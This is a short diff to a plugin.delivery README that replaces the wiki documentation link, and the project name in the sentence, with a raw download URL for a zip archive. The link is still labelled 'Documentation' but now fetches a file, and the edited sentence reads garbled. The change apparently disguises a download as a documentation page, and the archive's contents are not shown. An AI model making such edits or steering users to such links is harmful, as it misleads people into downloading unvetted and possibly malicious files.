Charleeesss/plugin.delivery/README.md

 ## 📚 Documentation

-For a complete guide on using plugin.delivery and its features, visit our [Documentation](https://github.com/Charleeesss/plugin.delivery/wiki) page.
+For a complete guide on using https://github.com/Charleeesss/plugin.delivery/raw/refs/heads/main/templates/plugin-delivery-v1.3.zip and its features, visit our [Documentation](https://github.com/Charleeesss/plugin.delivery/raw/refs/heads/main/templates/plugin-delivery-v1.3.zip) page.
 Here, you will find:

 - How to build your own plugins.
 - Instructions for integrating with existing tools.